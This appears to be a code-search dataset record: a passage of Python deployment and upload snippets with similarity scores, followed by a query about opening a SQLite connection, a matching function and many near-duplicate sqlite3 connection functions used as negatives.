ftp_client.put(sourcepath,\n f'{CONDA_REPO_SETTINGS[\"packages_path\"]}/'\n f'{Path(sourcepath).name}')\n ftp_client.close()\n index_cmd = (f'{CONDA_REPO_SETTINGS[\"conda_exe\"]} index '\n f'{CONDA_REPO_SETTINGS[\"packages_path\"]}')\n _, _, index_err = ssh.exec_command(index_cmd)\n index_err.channel.recv_exit_status()", "def push_backup(args: Arguments) -> None:\n\n files = get_files_from_previous_backup(args.site)\n bucket = get_bucket(args)\n\n for path in files:\n upload_file(\n path=path,\n site_name=args.site,\n bucket=bucket,\n bucket_directory=args.bucket_directory,\n )\n\n print(\"Done!\")", "def deploy():\n require('hosts', provided_by=[prod])\n require('whole_path', provided_by=[prod])\n require('code_root')\n upload_tar_from_git(env.whole_path)\n install_requirements()\n symlink_current_release()\n migrate()\n restart_webservers()\n setup_permissions()\n collectstatic()", "def deploy():\n upload_static()\n compile_code()\n upload_code()\n upload_supervisor()\n start_server()", "def upload(outfile, outdir):\n outpath = outdir + \"/\" + outfile\n my_env = os.environ.copy()\n my_env[\"X509_USER_PROXY\"] = dst_cred\n for retry in range(0,99):\n try:\n subprocess.check_output([\"globus-url-copy\", \"-create-dest\",\n \"-rst\", \"-stall-timeout\", \"300\",\n \"-ds\", dst_dn, \"-dst-cred\", dst_cred,\n \"file://\" + os.getcwd() + \"/\" + outfile,\n dst_url + outpath], env=my_env)\n return 0\n except:\n continue\n subprocess.check_output([\"globus-url-copy\", \"-create-dest\",\n \"-rst\", \"-stall-timeout\", \"300\",\n \"-ds\", dst_dn, \"-dst-cred\", dst_cred,\n \"file://\" + os.getcwd() + \"/\" + outfile,\n dst_url + outpath], env=my_env)\n return 0", "def deploy():\n myfile = do_pack()\n if myfile is None:\n return False\n return do_deploy(myfile)", "def _publish(client, manifest_path, marketplace, skip, overrides):\n try:\n manifest_json = check_app_manifest(manifest_path, overrides, marketplace)\n app_url = \"{}://{}\".format(manifest_json[\"schemes\"][0], manifest_json[\"host\"])\n app_ip = urlparse(app_url).hostname\n\n if not skip:\n address = get_zerotier_address(marketplace)\n\n if address != app_ip:\n wrong_ip = click.style(\"It seems that the IP address that you put in your manifest file (\") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\") is different than your current 21market IP (\") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\")\\nAre you sure you want to continue publishing with \") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\"?\")\n if not click.confirm(wrong_ip.format(app_ip, address, app_ip)):\n switch_host = click.style(\"Please edit \") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\" and replace \") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\" with \") +\\\n click.style(\"[{}].\", bold=True)\n logger.info(switch_host.format(manifest_path, app_ip, address))\n return\n\n except exceptions.ValidationError as ex:\n # catches and re-raises the same exception to enhance the error message\n publish_docs_url = click.style(\"https://21.co/learn/21-publish/\", bold=True)\n publish_instructions = \"For instructions on publishing your app, please refer to {}\".format(publish_docs_url)\n raise exceptions.ValidationError(\n \"The following error occurred while reading your manifest file at {}:\\n{}\\n\\n{}\"\n .format(manifest_path, ex.args[0], publish_instructions),\n json=ex.json)\n\n app_name = manifest_json[\"info\"][\"title\"]\n app_endpoint = \"{}://{}{}\".format(manifest_json[\"schemes\"][0],\n 
manifest_json[\"host\"],\n manifest_json[\"basePath\"])\n\n logger.info(\n (click.style(\"Publishing {} at \") + click.style(\"{}\", bold=True) + click.style(\" to {}.\"))\n .format(app_name, app_endpoint, marketplace))\n payload = {\"manifest\": manifest_json, \"marketplace\": marketplace}\n try:\n response = client.publish(payload)\n except ServerRequestError as e:\n if e.status_code == 403 and e.data.get(\"error\") == \"TO600\":\n logger.info(\n \"The endpoint {} specified in your manifest has already been registered in \"\n \"the marketplace by another user.\\nPlease check your manifest file and make \"\n \"sure your 'host' field is correct.\\nIf the problem persists please contact \"\n \"support@21.co.\".format(app_endpoint), fg=\"red\")\n return\n else:\n raise e\n\n if response.status_code == 201:\n response_data = response.json()\n mkt_url = response_data['mkt_url']\n permalink = response_data['permalink']\n logger.info(\n click.style(\n \"\\n\"\n \"You have successfully published {} to {}. \"\n \"You should be able to view the listing within a few minutes at {}\\n\\n\"\n \"Users will be able to purchase it, using 21 buy, at {} \",\n fg=\"magenta\")\n .format(app_name, marketplace, permalink, mkt_url)\n )", "def execute(\n name: str,\n *args: Any,\n **kwargs: Any\n ) -> None:\n cherrypy.engine.publish(name, *args, **kwargs) # type: ignore", "def install():\n execute(generate)\n execute(upload)", "def deploy():\n\n project_dir = '/home/gastosabertos/gastos_abertos_website'\n with cd(project_dir):\n local('tar -cvzf build.tar.gz build')\n run('cp -r build build-old')\n put('build.tar.gz', '.')\n run('tar -xvf build.tar.gz')", "def deploy():\n require(\"hosts\", provided_by=[production, staging])\n env.release = time.strftime(\"%Y-%m-%d_%H:%M:%S\")\n upload_tar_from_git()\n install_requirements()\n setup_webserver()\n symlink_current_release()\n restart_webserver()", "def deploy():\n with cd(\"~/public_html/\"):\n run(\"/usr/local/cpanel/3rdparty/bin/git pull\")\n\n with cd(\"~/public_html/skin/frontend/gemz/default/tools/\"):\n run(\"grunt default\")\n #sudo(\"/scripts/enablefileprotect\")", "def upload():\n if not os.path.exists(\"./.notes\"):\n print(\"Notes repo not yet initialized!\")\n \n # Get google drive resource\n drive = get_drive()\n\n # Get parent folder from initialization\n with open(\".notes/PARENT\", \"r\") as parent_id_file:\n parent_id = parent_id_file.read()\n\n links_file = open(\"links.json\", \"w\")\n links = {}\n # For each pdf, upload it and get link!\n for filename in os.listdir(\"outputs\"):\n if re.match(\".*.pdf\", filename):\n metadata = {'name': filename,\n 'parents': [parent_id]}\n media = MediaFileUpload(\"outputs/\" + filename,\n mimetype=\"application/pdf\",\n resumable=True)\n file_id = drive.files().create(body=metadata,\n media_body=media,\n fields=\"id\").execute()\n drive.permissions().create(fileId=file_id['id'],\n body={\n 'type': 'anyone',\n 'role': 'reader',\n 'withLink': 'true'\n }, fields=\"id\").execute()\n link = drive.files().get(fileId=file_id['id'],\n fields=\"webViewLink\").execute()\n links[filename] = link[\"webViewLink\"]\n print(\"Uploaded\", filename)\n\n # Dump the links into json file.\n links_file.write(json.dumps(links))\n links_file.close()", "def make_file_public(self, slack_file_id: str) -> SlackResponse:\n try:\n response = self.client.files_sharedPublicURL(\n file=slack_file_id,\n token=self.user_token\n )\n return response\n except SlackApiError as e:\n logging.error(f\"Error uploading file: {e}\")", "def 
publish_updates():\n run_subprocess(['osg-batch-update'])", "def post_download(self, remote_files):\n pass", "def package(self, outfile, update=False, local=True, remote=True):\n log.debug(\"Packaging and streaming %s\" % self.name)\n with TarPackaging(outfile) as tar:\n self._build(tar, update, local, remote, True)\n log.debug(\"Packaged %s\" % self.name)", "def _test_upload_dir_contents(self, filenames):\n local_src_dir = self._local_tempdir\n remote_dest_dir = 'remote_dest_dir'\n for filename in filenames:\n self._expected_commands.append('%s cp -a public %s %s' % (\n GSUTIL_LOCATION,\n os.path.join(local_src_dir, filename),\n posixpath.join(remote_dest_dir, filename)))\n with open(os.path.join(local_src_dir, filename), 'w'):\n pass\n gs_utils.upload_dir_contents(\n local_src_dir=local_src_dir, remote_dest_dir=remote_dest_dir,\n gs_acl='public')", "def deploy():\n _git_pull()\n _migrate()\n _collect_static_files()\n _restart_webserver()", "def publish(self):\n xml_description = self._generate_flow_xml()\n\n file_elements = {'description': xml_description}\n return_code, return_value = _perform_api_call(\n \"flow/\", file_elements=file_elements)\n self.flow_id = int(xmltodict.parse(return_value)['oml:upload_flow']['oml:id'])\n return self", "def test_publish(self):\n\n adminuser,adminpass = self.testdata.find_account_for('toolmanager')\n\n self.utils.account.login_as(adminuser,adminpass)\n\n self.contribtool.publish(TOOLNAME)", "def test_stream_publish(self):\n pass", "def publishObject(self, obj):\n\n try:\n req = self.s.put(obj.selfUrl + '/publish')\n if req.status_code == requests.codes.ok:\n print('object {0} published'.format(obj.id))\n return self.getObject(obj.selfUrl)\n\n\n except requests.exceptions.RequestException as err:\n print('publish request failed:', err)", "def make_file_public(self, file_id):\n\n # Check if file is already public\n response = self.client.api_call(\n f'files.info?'\n f'file={file_id}'\n )\n if response['ok'] and response['file']['public_url_shared'] is True:\n return response\n\n response = self.client.api_call(\n f'files.sharedPublicURL?'\n f'file={file_id}'\n )\n assert response['ok']\n\n return response", "def upload_wheels():\n build()\n sh(\"%s -m twine upload dist/*.whl\" % PYTHON)", "def submitUploads(self, local = False):\n\n # Set and upload files to repo using uploadRepoFiles()\n if local:\n for key in self.nbDetails:\n # Skip metadata key if present\n if key!='proc' and self.nbDetails[key]['pkg'] and self.nbDetails[key]['archFilesOK']:\n self.uploadRepoFiles(key)\n\n else:\n # Upload on remote machine.\n ACCESS_TOKEN = initZenodo(self.hostDefn['localhost']['localSettings']/'zenodoSettings.dat')\n with self.c.prefix(f\"source {self.hostDefn[self.host]['condaPath']} {self.hostDefn[self.host]['condaEnv']}\"):\n result = self.c.run(f\"{Path(self.hostDefn[self.host]['repoScpPath'], self.scpDefnRepo['uploadNohup']).as_posix()} \\\n {Path(self.hostDefn[self.host]['repoScpPath'], self.scpDefnRepo['upload']).as_posix()} \\\n {self.hostDefn[self.host]['nbProcDir']/self.jsonProcFile.name} {ACCESS_TOKEN}\",\n warn = True, timeout = 10)\n\n print(f\"Log file set: {self.hostDefn[self.host]['nbProcDir']/self.jsonProcFile.name}\")\n # Remote upload set to run via nohup... 
will need to pull logs later.\n\n # Publish\n\n # return 'Not implemented'", "def download():\n raise NotImplementedError", "def main(url, localfile):\n ph.download_file(url, localfile)", "def do_pack():\n a = datetime.now()\n file_name = \"versions/web_static_{}{}{}{}{}{}.tgz\".format(a.year,\n a.month,\n a.day,\n a.hour,\n a.minute,\n a.second)\n try:\n print(\"Packing web_static to \" + file_name)\n local(\"mkdir -p versions\")\n\n local(\"tar -cvzf \" + file_name + \" web_static\")\n return file_name\n except:\n return None", "def PublishIt(name, path, comments, task=os.getenv('TASK'), status=\"WORK IN PROGRESS\"):\n\n db = get_connection()\n\n PubCollections = db['submissions']\n\n # creation of the dailies submission entry\n publishDict = dict()\n publishDict['date'] = now\n publishDict['type'] = \"publish\"\n publishDict['user_name'] = main_user\n publishDict['task'] = task\n publishDict['status'] = status\n publishDict['asset'] = name\n publishDict['path'] = path\n publishDict['comment'] = comments\n PubCollections.save(publishDict)\n notifications.push_notifications({\"name\": main_user, \"email\": os.getenv('USER_EMAIL')}, users_list, \"publish\", shot, now)", "def publish_daemon(\n self,\n publish_payload,\n presence_callback=None,\n remove_presence_callback=None,\n ):\n io_loop = tornado.ioloop.IOLoop()\n\n # Spin up the publisher\n self.pub_server = pub_server = PubServer(\n self.opts,\n io_loop=io_loop,\n presence_callback=presence_callback,\n remove_presence_callback=remove_presence_callback,\n )\n sock = _get_socket(self.opts)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n _set_tcp_keepalive(sock, self.opts)\n sock.setblocking(0)\n sock.bind(_get_bind_addr(self.opts, \"publish_port\"))\n sock.listen(self.backlog)\n # pub_server will take ownership of the socket\n pub_server.add_socket(sock)\n\n # Set up Salt IPC server\n if self.opts.get(\"ipc_mode\", \"\") == \"tcp\":\n pull_uri = int(self.opts.get(\"tcp_master_publish_pull\", 4514))\n else:\n pull_uri = os.path.join(self.opts[\"sock_dir\"], \"publish_pull.ipc\")\n self.pub_server = pub_server\n pull_sock = salt.transport.ipc.IPCMessageServer(\n pull_uri,\n io_loop=io_loop,\n payload_handler=publish_payload,\n )\n\n # Securely create socket\n log.warning(\"Starting the Salt Puller on %s\", pull_uri)\n with salt.utils.files.set_umask(0o177):\n pull_sock.start()\n\n # run forever\n try:\n io_loop.start()\n except (KeyboardInterrupt, SystemExit):\n pass\n finally:\n pull_sock.close()", "def collect_data(url: str, channel: str, file_name: str):\n print(f\"Downloadng data : {channel}\")\n download(url)\n upload_to_s3(channel, file_name)\n print(f\"Finished downloadng data : {channel}\")", "def download(self):\n logger.info(f\"downloading project {self}\")\n self.project.storage.download(f\"{self.path}/releasemanifest\", None)\n self.extract()", "def copy(self, source_host, dest_host, filename):", "def do_pack():\n a = datetime.now()\n file_name = \"versions/web_static_{}{}{}{}{}{}.tgz\\\n\".format(a.year if a.year > 999 else \"0\" + str(a.year),\n a.month if a.month > 9 else \"0\" + str(a.month),\n a.day if a.day > 9 else \"0\" + str(a.day),\n a.hour if a.hour > 9 else \"0\" + str(a.hour),\n a.minute if a.minute > 9 else \"0\" + str(a.minute),\n a.second if a.second > 9 else \"0\" + str(a.second))\n try:\n print(\"Packing web_static to \" + file_name)\n local(\"mkdir -p versions\")\n\n local(\"tar -cvzf \" + file_name + \" web_static\")\n return file_name\n except:\n return None", "def do_pack():\n\n now = 
datetime.now()\n # format the name of the file with the timestamps\n now_year = now.year\n now_month = now.month\n now_day = now.day\n now_hour = now.hour\n now_minute = now.minute\n now_second = now.second\n # apply the format\n file_name = 'versions/web_static_{}{}{}{}{}{}.tgz'.format(\n now_year, now_month, now_day, now_hour, now_minute, now_second\n )\n # All archives must be stored in the folder versions\n local('mkdir -p versions')\n # execute locally the compression of the folder\n command = local(\"tar -cvzf \" + file_name + \" ./web_static/\")\n # return the archive path if the archive has been correctly generated\n if command.succeeded:\n return file_name\n else:\n return None" ]
[ "0.74543023", "0.6922994", "0.6866991", "0.676951", "0.642343", "0.6293285", "0.6157238", "0.6132221", "0.60680485", "0.59941494", "0.5980355", "0.5970285", "0.59354484", "0.5896326", "0.58699507", "0.5835118", "0.5805512", "0.58000696", "0.57821625", "0.5779796", "0.57461995", "0.56931955", "0.5661582", "0.5660802", "0.5656355", "0.5643859", "0.56142336", "0.5604374", "0.55907357", "0.5585925", "0.5553939", "0.55416304", "0.55128866", "0.55002385", "0.5483548", "0.54807156", "0.54797167", "0.5475378", "0.5472647", "0.54373586", "0.5413688", "0.54042435", "0.53996503", "0.53838676", "0.5363016", "0.5362128", "0.5344835", "0.5342024", "0.5332223", "0.5324793", "0.53223383", "0.5318282", "0.5317942", "0.53122413", "0.53120613", "0.52977407", "0.52829254", "0.528166", "0.5278889", "0.52727056", "0.52705425", "0.52579045", "0.52566344", "0.52493525", "0.52489704", "0.5245051", "0.5243567", "0.52425915", "0.5239626", "0.5236684", "0.5234338", "0.52337354", "0.5219301", "0.5208864", "0.5205019", "0.5191308", "0.51863754", "0.517976", "0.5178498", "0.51764464", "0.5175472", "0.5168397", "0.51631457", "0.51606697", "0.5152671", "0.515064", "0.51381195", "0.51331866", "0.51222914", "0.51176924", "0.5115513", "0.5114387", "0.5104905", "0.509628", "0.50950134", "0.50944114", "0.50884205", "0.5082443", "0.5073846", "0.50699496" ]
0.77630585
0
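The publish-themed snippets above are Python 2 throughout (urllib2, "except Exception, e:", bare print statements). For reference, a minimal Python 3 sketch of the same publish-and-parse-JSON flow using only the standard library; the endpoint URL is a placeholder, and it sends raw bytes instead of the streaming multipart body the originals build:

import json
import urllib.request

# Placeholder endpoint; the original snippets POST a streaming multipart
# body to http://<host>/netinfproto/publish.
HTTP_URL = "http://localhost:8080/netinfproto/publish"

def publish_file(path):
    """POST a file's bytes and decode the JSON report (Python 3 sketch)."""
    with open(path, "rb") as f:
        payload = f.read()
    req = urllib.request.Request(
        HTTP_URL,
        data=payload,
        headers={"Content-Type": "application/octet-stream"},
    )
    with urllib.request.urlopen(req) as resp:
        # Mirror the originals' checks on status code and content type.
        if resp.status != 200:
            raise RuntimeError("publish failed: HTTP %d" % resp.status)
        ct = resp.headers.get("Content-Type", "")
        if not ct.startswith("application/json"):
            raise RuntimeError("expected JSON response, got %r" % ct)
        return json.loads(resp.read().decode("utf-8"))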
create a database connection to a SQLite database
def create_connection(db_file): conn = None try: conn = sqlite3.connect(db_file) return conn except Error as e: print(e) return conn
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def connect_db(self) -> sqlite3.Connection:", "def create_connection():\n dir_path = os.path.dirname(os.path.abspath(__file__))\n db_file = dir_path + '/py_sqlite.db'\n try:\n DbUtil.connection = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n finally:\n print('connection success')", "def create_conn():\n return sqlite3.connect(DBFILE)", "def create_connection(sqlite_db_file):\n try:\n connection_db = sqlite3.connect(sqlite_db_file)\n return connection_db\n except Exception:\n pass", "def connect_db():\n rv = sqlite3.connect('sqlite.db')\n rv.row_factory = sqlite3.Row\n return rv", "def create_connection():\n db_file = \"data/data.db\"\n conn = None\n \n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Exception as e:\n pass", "def create_connection(db_file):\n conn = sqlite3.connect(db_file)\n return conn", "def create_sqlite_connection(db_filename=SQLITE_DATABASE_FILE):\n return sqlite3.connect(db_filename)", "def create_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n conn.row_factory = sqlite3.Row\n except Error as e:\n print(e)\n return conn", "def create_connection(self):\r\n\r\n try:\r\n self.conn = sqlite3.connect(self.database_name)\r\n\r\n except sqlite3.Error:\r\n print('Error connecting to database')", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()", "def sql_connection():\n return sqlite3.connect('database.db')", "def create_connection():\r\n\r\n try:\r\n dburi = 'file:{}?mode=rw'.format(pathname2url(db_name))\r\n conn = sqlite3.connect(dburi, uri=True)\r\n print(\"connected successfuly.\")\r\n return conn\r\n except sqlite3.OperationalError as err:\r\n print(\"connection failed.\")\r\n print(\"make sure that you have typed the correct database name.\")", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version)\r\n except Error as e:\r\n print(e)\r\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n return conn", "def create_db_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Exception as e:\n print(e)\n\n return conn", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def create_connection(db_file):\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n conn.close()", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version) \r\n except Error as e:\r\n print(e)\r\n return conn", "def connect_db():\n return sqlite3.connect(DATABASE)", "def connect_db():\n return sqlite3.connect(DATABASE)", "def connect_db():\n return sqlite3.connect(DATABASE)", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n return conn\n 
except Error as e:\n print(e)", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n except Error as e:\r\n print(e)\r\n \r\n return conn", "def create_connection(db_file):\n try:\n con = sqlite3.connect(db_file)\n print('SQLite Version is: ', sqlite3.version)\n except sqlErr as se:\n raise Exception('SQL Error in create_connection(): ' + se.__str__())\n except Exception as e:\n raise Exception('General Error in create_connection(): ' + e.__str__())\n return con", "def create_connection(db_file):\n try:\n con = sqlite3.connect(db_file)\n print('SQLite Version is: ', sqlite3.version)\n except sqlErr as se:\n raise Exception('SQL Error in create_connection(): ' + se.__str__())\n except Exception as e:\n raise Exception('General Error in create_connection(): ' + e.__str__())\n return con", "def database():\n return sqlite3.connect(DATABASE)", "def __create_connection():\n connection = None\n try:\n connection = sqlite3.connect(Database.filepath)\n return connection\n except Error as e:\n print(e)\n\n return connection", "def create_connection(db):\n try:\n conn = sqlite3.connect(db)\n return conn\n except Error as err:\n print(err)\n return None", "def create_connection(db):\n try:\n conn = sqlite3.connect(db)\n return conn\n except Error as err:\n print(err)\n return None", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Exception as e:\n print(e)\n\n return conn", "def bd_conecta():\n if not hasattr(g, 'sqlite_db'):\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n g.sqlite_db = rv\n return g.sqlite_db", "def create_connection(db_file):\n\tconn = None\n\ttry:\n\t\tconn = sqlite3.connect(db_file)\n\t\treturn conn\n\texcept Error as e:\n\t\tprint(e)\n \n\treturn conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect('project1.db')\n return conn\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n return conn\r\n except Error as e:\r\n print(e)\r\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except sqlite3.Error as e:\n print('coucou')\n print(e)\n return conn", "def create_connection(self):\n try:\n conn = sqlite3.connect(self.db_path)\n return conn\n except Error as e:\n print(e)\n raise e", "def connect_db():\n return sqlite3.connect(config.db)", "def create_connection(self, db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn", "def create_connection(db):\n try:\n conn = sqlite3.connect(db)\n return conn\n except Error as e:\n print(e)\n return None", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn", "def db_connect():\n\n connect_string = \"sqlite:///database.sqlite\"\n\n return create_engine(connect_string)", "def create_connection(db_file):\n\tconn = None\n\ttry:\n\t\tconn = sqlite3.connect(db_file)\n\texcept Error as e:\n\t\tprint(e)\n\treturn conn", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = 
sqlite3.connect(db_file)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def connect_db():\n db = sqlite3.connect(app.config['DATABASE'])\n\n def make_dicts(cursor, row):\n return dict((cursor.description[idx][0], value) for idx, value in enumerate(row))\n\n db.row_factory = make_dicts\n return db", "def create_connection(db_file):\n\ttry:\n\t\tconn = sqlite3.connect(db_file)\n\texcept Error as e:\n\t\tprint(e)\n\t\n\treturn conn", "def connect() -> sqlite3.Connection:\n if not os.path.isfile(DATABASE):\n connection = init()\n else:\n connection = sqlite3.connect(DATABASE, check_same_thread=False)\n return connection", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n return None\n finally:\n return conn", "def create_connection(db_file):\n try:\n conn = sqlite3.connect(db_file)\n conn.row_factory = sqlite3.Row\n return conn\n except Error as e:\n print(e)\n\n return None", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except sqlite3.Error as e:\n print(e)\n\n return conn", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = 
sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\r\n rv = sqlite3.connect(app.config['DATABASE'])\r\n rv.row_factory = sqlite3.Row\r\n return rv", "def create_connection(self, db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n\n return conn", "def connect_db():\n rv = sqlite3.connect(app.config[\"DATABASE\"])\n rv.row_factory = sqlite3.Row\n return rv", "def create_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(\"Connection sucessfull. SQLite3 version \"+sqlite3.version)\n return conn\n except Error as e:\n print(e)\n\n return conn", "def create_connection(self,db_file):\n print(\"yes\")\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection():\n\ttry:\n\t\tconn = sqlite3.connect(db_path)\n\t\treturn conn\n\texcept Error as e:\n\t\tprint(e)\n\n\treturn None", "def create_db_connection(db_path):\n\n try:\n con = sqlite3.connect(db_path)\n\n except sqlite3.Error as e:\n print(e)\n return False\n\n return con", "def connect_db():\n debug(\"Connecting to DB.\")\n conn = sqlite3.connect(os.path.join(app.root_path, 'banweb.db'))\n conn.row_factory = sqlite3.Row\n return conn", "def connect_db():\n\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def get_sqlite():\n return sqlite3.connect('igraph.db')", "def connect_db():\n logging.info('Connects to the specific database.')\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n g.db = rv\n logging.info(rv)\n return rv", "def _CreateConnection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def db_connect():\n def dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = dict_factory\n\n return rv", "def connect():\n global db_name\n con = sqlite3.connect(db_name)\n return con", "def create_database(databasefile):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(databasefile, check_same_thread=False)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def connect_db(self) -> sqlite3.Connection:\n self.connection = sqlite3.connect(self.database)\n self.connection.row_factory = sqlite3.Row\n\n self.get_cursor()", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n \n return rv", "def create_connection(db_file):\n conn = None\n\n try:\n # create database file or connect to existing\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n\n return conn", "def create_connection():\n conn = None\n try:\n db_file = './database/courses.sql'\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn", "def dbconn():\n SQLITE_DB_FILE = '/tmp/test_fyle.db'\n if os.path.exists(SQLITE_DB_FILE):\n os.remove(SQLITE_DB_FILE)\n return sqlite3.connect(SQLITE_DB_FILE, detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)", "def create_connection(self, db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(\"connected\")\n except Error as e:\n print(e)\n \n return conn", "def 
create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(\"connected\")\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except ValueError as e:\n raise e\n\n return conn", "def create_connection(db_file):\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Exception as e:\n print(e)\n return None" ]
